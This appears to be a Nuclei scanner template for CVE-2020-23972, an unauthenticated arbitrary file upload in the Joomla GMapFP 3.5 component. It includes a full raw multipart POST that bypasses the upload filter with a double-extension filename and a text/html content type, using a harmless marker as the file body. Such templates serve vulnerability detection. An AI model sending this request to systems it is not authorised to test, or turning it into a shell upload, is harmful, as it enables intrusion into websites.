Joomla! Component GMapFP 3.5 - Arbitrary File Upload

id: CVE-2020-23972

info:
  name: Joomla! Component GMapFP 3.5 - Arbitrary File Upload
  author: dwisiswant0
  severity: high
  description: |
    Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application
    without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected Joomla! website.
  remediation: |
    Apply the latest security patch or update to a patched version of Joomla! Component GMapFP 3.5 to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/49129
    - https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md
    - http://packetstormsecurity.com/files/159072/Joomla-GMapFP-J3.5-J3.5F-Arbitrary-File-Upload.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-23972
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-23972
    cwe-id: CWE-434
    epss-score: 0.31444
    epss-percentile: 0.9806
    cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:*
  metadata:
    max-request: 2
    vendor: gmapfp
    product: gmapfp
    framework: joomla\!
  tags: cve2020,cve,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\!,vkev,vuln
variables:
  name: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Referer: {{BaseURL}}
        Connection: close

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="option"

        com_gmapfp
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="image1"; filename="{{name}}.html.gif"
        Content-Type: text/html

        projectdiscovery

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="no_html"

        no_html
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS--

    payloads:
      component:
        - "com_gmapfp"
        - "comgmapfp"

    extractors:
      - type: regex
        regex:
          - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"
        part: body
# digest: 4a0a00473045022100ae5222932bbe80950f173c3d08d6fc81452ed8628a52bfcc764b31c575d3e9b402201121150d81576ad0f40dc5b71a6b51d8046429fde4c2a9bfc396e400ac384da3:922c64590222798bb761d5b6d8e72950